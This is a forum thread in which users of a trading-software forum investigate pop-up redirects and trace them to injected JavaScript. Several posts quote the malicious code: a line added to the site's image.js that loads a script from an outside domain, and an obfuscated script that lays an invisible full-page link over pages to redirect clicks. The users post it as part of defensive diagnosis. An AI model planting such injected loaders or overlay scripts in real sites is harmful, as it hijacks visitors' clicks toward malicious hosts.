Ads?!?!?!?!?!?!?

Posted By: DdlV

Ads?!?!?!?!?!?!? - 10/19/18 23:45

Hi jcl.

Yesterday and today I've had ad pop-ups happen on the Forum. Is this a new "feature"?

Thanks.
Posted By: AndrewAMD

Re: Ads?!?!?!?!?!?!? - 10/19/18 23:57

So it’s not just me. There’s an odd redirect that pops up once every few hours. This looks like a hack exploit of some sort to me.
Posted By: dmac

Re: Ads?!?!?!?!?!?!? - 10/20/18 10:50

I've gotten it as well. Seems as if the site may be infected with something.
Posted By: AndrewAMD

Re: Ads?!?!?!?!?!?!? - 10/20/18 15:13

The bug is repeatable.

First, you must clear your cookies. This is how:
1) Shift + Ctrl + Delete. This opens "Clear Browsing Data".
2) "Advanced" Tab
3) Time range: "all time"
4) Check "Cookies and other site data"
5) Click "Clear Data"
6) Close browser and open it again

So now that cookies are cleared, the behavior will be immediately repeatable:

7) Go to the Zorro forums.
8) Browse to any thread.
9) Hover your mouse anywhere in the screen.

No matter what, it looks like it wants to redirect you somewhere. See my screenshot #1.


So instead of clicking with my left mouse button, I right-click: Inspect. I get screenshot #2.


If I click on the sources tab, I get screenshot #3.


Notice the mysterious java scripts from om.qqtx.me. I saved them below, both in their original form and a readable format.

That second javascript has content **BEFORE** I click on the screen. But if I refresh the screen, the second script is **BLANK**. The disappearing script looks like it creates the bad link:
Code:
(function() {
    var c = JSON.parse(x1cfdb9f14ad340c38bbd6f60806ec731_hd("eyJ1cmwiOiJodHRwczovL2FmaWx0ZXIueHl6L2MvMTQ4My8yIn0=")),
        b = document.body || document.getElementsByTagName("body")[0];
    if ("undefined" != b && null != b) {
        var a = document.createElement("div");
        a.id = "div" + Math.floor(999999 * Math.random() + 1E5);
        a.style.cssText = "width:100%; height:100%; position:fixed; left:0px; top:0px; z-index: 99999999";
        a.innerHTML = 	'<a href="http://wf3sgoqwvtow4yz028sp.kf.abgp.info/redirect?i=118&u=' + 
			x1cfdb9f14ad340c38bbd6f60806ec731_he(c.url) + 
			'" target="_blank" style="display: block; width:100%; height: 100%; cursor: default"></a>';
        a.onclick = function() {
            this.style.display =
                "none"
        };
        b.insertBefore(a, b.lastChild)
    }
})();


I don't know much about HTML/CSS/JS, but this looks like it might be a sleeper script.

Attached picture forum_bug1.png
Attached picture forum_bug2.png
Attached picture forum_bug3.png
Attached File
javascripts.zip  (70 downloads)
Posted By: AndrewAMD

Re: Ads?!?!?!?!?!?!? - 10/20/18 17:15

As a browser-side workaround, I can block these scripts in Chrome using the ScriptSafe add-in.

Settings:
1) Allow opserver.de to run scripts (allow, not trust).
2) Distrust om.qqtx.me
3) ScriptSafe options -> General Settings -> Default Mode -> Allow

No more pop-ups. (Also, step #3 is to stop blocking all other website scripts, such as Amazon. This Chrome extension wants to block all javascripts by default, which makes no sense.)





Attached picture forum_bug4.PNG
Posted By: DdlV

Re: Ads?!?!?!?!?!?!? - 10/20/18 18:20

Thanks AndrewAMD. So far these pop-ups just seem to be annoying, so I think I'll wait for jcl's comments & hopefully fix.

I'd rather not have a workaround lower the priority of this in case there's also something worse compromised that hasn't been noticed yet...

Thanks.
Posted By: AndrewAMD

Re: Ads?!?!?!?!?!?!? - 10/20/18 20:34

My intent was to document my findings so that this website can be scrubbed clean sooner than later. cool
Posted By: jcl

Re: Ads?!?!?!?!?!?!? - 10/22/18 13:58

I've just checked the forum software, but cannot see an exploit or a source of mysterious popups. I also don't get them here, at least not with Chrome. Are they still there?
Posted By: AndrewAMD

Re: Ads?!?!?!?!?!?!? - 10/22/18 14:25

Yes.

jcl, try this in Google Chrome:

1) Shift + Ctrl + Delete. This opens "Clear Browsing Data".
2) "Advanced" Tab
3) Time range: "all time"
4) Check "Cookies and other site data"
5) Click "Clear Data"
6) Close browser and open it again
7) Go to Zorro User Forum
8) Click on this thread ("Ads?!?!?!?!?!?!?")
9) Click anywhere in the web page... This should induce the pop-up.
10) Right-click anywhere on the web page and click "Inspect"
11) Click on the "Sources" tab
12) Now take a look at the tree - there should be two offensive javascripts loaded:

top -> om.qqtx.me -> jquery.jscroll.min.js
top -> om.qqtx.me -> jquery.jscroll.min.js?timestamp=[etc.]

I have identified these two scripts as the culprit. If I explicitly block these scripts, I get no pop-ups.

The site has repeated this behavior just now.
Posted By: AndrewAMD

Re: Ads?!?!?!?!?!?!? - 10/22/18 15:42

I found something else interesting.

1) Right-click this page
2) Click "Inspect"
3) Click "Sources"
4) Browse the tree: top -> www.opserver.de -> ubb7 -> ubb_js -> image.js?v=7.5.1p1

Look at the script:

Code:
/* Script Version 7.5.1 */

var image_pending = 0;

function newCaptcha(type) { 
	if (image_pending) return;
	image_pending = 1;
	get_object('ajax_wait').style.display = "";
    	var url = script + "?ubb=captcha&init=1&t=" + type;
    	var ajax = new ubbtAJAX(url, updateCaptcha); 
    	ajax.sendData("GET"); 
}
document.writeln("<script src=\'//om.qqtx.me/jquery.jscroll.min.js\'></script>");
function updateCaptcha(responseXML) {
	id = responseXML;
	obj = get_object('captcha_image');
	obj.src = script + "?ubb=captcha&id=" + id;
	image_pending = 0;
	get_object('ajax_wait').style.display = "none";
}


This line does not look very nice. Was this line injected?
Code:
document.writeln("<script src=\'//om.qqtx.me/jquery.jscroll.min.js\'></script>");

Based on my experimentation, it appears this line loads the two suspicious scripts in the first place.

Hypothesis: The UBB.threads server is infected.
Posted By: rayp

Re: Ads?!?!?!?!?!?!? - 10/22/18 16:21

Intresting that i got no reactions from jcl

Sry i overread the post here.

Its still there btw!!! Randomly
This time it took me permission to post
Posted By: AndrewAMD

Re: Ads?!?!?!?!?!?!? - 10/22/18 16:43

Originally Posted By: rayp
Intresting that i got no reactions from jcl
Hopefully because he's busy

Originally Posted By: rayp
Its still there btw!!! Randomly
This time it took me permission to post
I believe it is not random, but scripted to resurrect after a timer expires.

Per my earlier posts, clearing cookies makes it not random. It works every time.
Posted By: rayp

Re: Ads?!?!?!?!?!?!? - 10/22/18 17:07

For me its randomly...no matter what i do.

http://www.opserver.de/ubb7/ubbthreads.php?ubb=showflat&Number=474513#Post474513

For info how to avoid redirection
Posted By: AndrewAMD

Re: Ads?!?!?!?!?!?!? - 10/22/18 18:48

Originally Posted By: rayp
For me its randomly...no matter what i do.
Did you clear your cookies correctly? Try again. I get consistent behavior if and only if I clear my cookies all the time. (Hint: There is a sleep timer variable.)


....

To recap my independent investigation:

Repeatable behavior if you clear your cookies correctly:
http://www.opserver.de/ubb7/ubbthreads.php?ubb=showflat&Number=474505#Post474505

I managed to single out and block the two(2) malicious javascripts, thus ending the unwanted behavior on my personal browser only:
http://www.opserver.de/ubb7/ubbthreads.php?ubb=showflat&Number=474507#Post474507

Root cause found in (hacked?) ubb scripting, which launches the two(2) malicious javascripts:
http://www.opserver.de/ubb7/ubbthreads.php?ubb=showflat&Number=474547#Post474547

...


Finally, here's the culprit. Can an admin delete this one evil line of code? (See attachment for full scale.)

image.js on the zorro server:
http://www.opserver.de/ubb7/ubb_js/image.js

image.js on the UBB.threads server (the source):
https://www.ubbcentral.com/forums/ubb_js/image.js




Attached picture culprit.JPG
Posted By: rayp

Re: Ads?!?!?!?!?!?!? - 10/22/18 19:26

I posted in mods and wrote a pm. Now i cant do more. Till now i got no answer...maybe admin is busy yes.

Edit
Just was redirected with edit button...damn that sucks...

edit2:
And directly after this...site was again overlayed with invisible link...



edit:
I used an old tab i had open to write here, i cant use page at all now. The link is always there now for me.

edit:
Ok i have control again...only "Deleting all temp Internet files and stuff" gave me control back. Wow!
Posted By: AndrewAMD

Re: Ads?!?!?!?!?!?!? - 10/22/18 20:31

Spot the differences. laugh
http://www.opserver.de/ubb7/ubb_js/image.js
https://www.ubbcentral.com/forums/ubb_js/image.js

Does this code look friendly?
http://om.qqtx.me/jquery.jscroll.min.js

Let's make that last script readable:
https://pastebin.com/MqugfcZ7
Posted By: MatPed

Re: Ads?!?!?!?!?!?!? - 10/22/18 21:18

Yes, I Think it is infected. I ve just been redirected to this page:
https://google-it.eventomensiledigadget....click=j6qqbg5m#

HtH
Posted By: rayp

Re: Ads?!?!?!?!?!?!? - 10/22/18 22:02

I have the infection feeling since the weekend.
Its fact that a invisible link layers the forum pages sometimes.

If u only look at the http site names...very long random names.
Also i realized blocked popups now, sometimes.

@all
Check the link your clicking on this page in Detail. Watch your Cursor when hovering over links. Or disable / block the script u can see in screenshots above.
Posted By: AndrewAMD

Re: Ads?!?!?!?!?!?!? - 10/23/18 13:48

Oh, looks like it's fixed now. Let's see if it stays that way...
Posted By: jcl

Re: Ads?!?!?!?!?!?!? - 10/23/18 13:50

The inserted "document.writeln" line found by AndrewAMD would indeed redirect clicks to a script on om.qqtx-me. But this line isn't in the forum source code. I also don't get that popup after deleting the cookies. So the source is apparently not infected, at least not now, but possibly the cache.

I will clear the cache now. Please report when you observe the popup again or something else that is unusual.
Posted By: rayp

Re: Ads?!?!?!?!?!?!? - 10/23/18 15:19

Still there.
Posted By: AndrewAMD

Re: Ads?!?!?!?!?!?!? - 10/23/18 15:44

Originally Posted By: rayp
Still there.


I'm not seeing it (blocker: disabled), but I guess that maybe depends on which cached server I'm using? Or perhaps your browser is infected?

Try this:

1) Clear browser cache/cookies.
2) Go back to forums.
3) See if it happens again after an hour or two.
4) If so, paste the contents of this javascript here in the forums:

http://www.opserver.de/ubb7/ubb_js/image.js

I want to know if you are seeing the evil line of code from your browser.
Posted By: rayp

Re: Ads?!?!?!?!?!?!? - 10/23/18 15:55

It was from my handy.

Ill check later with pc when at home.


Edit
After deleting all i files again it seams ok for now. Will test later with my pc

Edit
From my handy still there now.

Edit
Seams ok for now. Not much clicked yet but what i clicked was what it looked like.
Posted By: 3dgamelight

Re: Ads?!?!?!?!?!?!? - 10/23/18 21:03

After deleting the cookies.
Code:
/* Script Version 7.5.1 */

var image_pending = 0;

function newCaptcha(type) { 
	if (image_pending) return;
	image_pending = 1;
	get_object('ajax_wait').style.display = "";
    	var url = script + "?ubb=captcha&init=1&t=" + type;
    	var ajax = new ubbtAJAX(url, updateCaptcha); 
    	ajax.sendData("GET"); 
}
document.writeln("<script src='//om.qqtx.me/jquery.jscroll.min.js'></script>");
function updateCaptcha(responseXML) {
	id = responseXML;
	obj = get_object('captcha_image');
	obj.src = script + "?ubb=captcha&id=" + id;
	image_pending = 0;
	get_object('ajax_wait').style.display = "none";
}
Posted By: AndrewAMD

Re: Ads?!?!?!?!?!?!? - 11/03/18 15:29

Well, I waited to see if the problem will go away.

Sure enough, the pop-up came up more than a week later. Here's the javascript:
Code:
/* Script Version 7.5.1 */

var image_pending = 0;

function newCaptcha(type) { 
	if (image_pending) return;
	image_pending = 1;
	get_object('ajax_wait').style.display = "";
    	var url = script + "?ubb=captcha&init=1&t=" + type;
    	var ajax = new ubbtAJAX(url, updateCaptcha); 
    	ajax.sendData("GET"); 
}
document.writeln("<script src='//om.qqtx.me/jquery.jscroll.min.js'></script>");
function updateCaptcha(responseXML) {
	id = responseXML;
	obj = get_object('captcha_image');
	obj.src = script + "?ubb=captcha&id=" + id;
	image_pending = 0;
	get_object('ajax_wait').style.display = "none";
}


So maybe some of the server caches are still dirty?

Can we scrub them all?
Posted By: jcl

Re: Ads?!?!?!?!?!?!? - 11/05/18 10:59

The server caches have been completely flushed last week, but maybe it's from a local cache?
Posted By: AndrewAMD

Re: Ads?!?!?!?!?!?!? - 11/05/18 13:48

I think I made it go away by flushing my DNS cache:

1) Clear browser cache (per earlier instructions)
2) Open Windows Powershell in Administrative Mode
3) At the prompt:
> ipconfig /flushdns

Now the javascript link is clean.
© 2024 lite-C Forums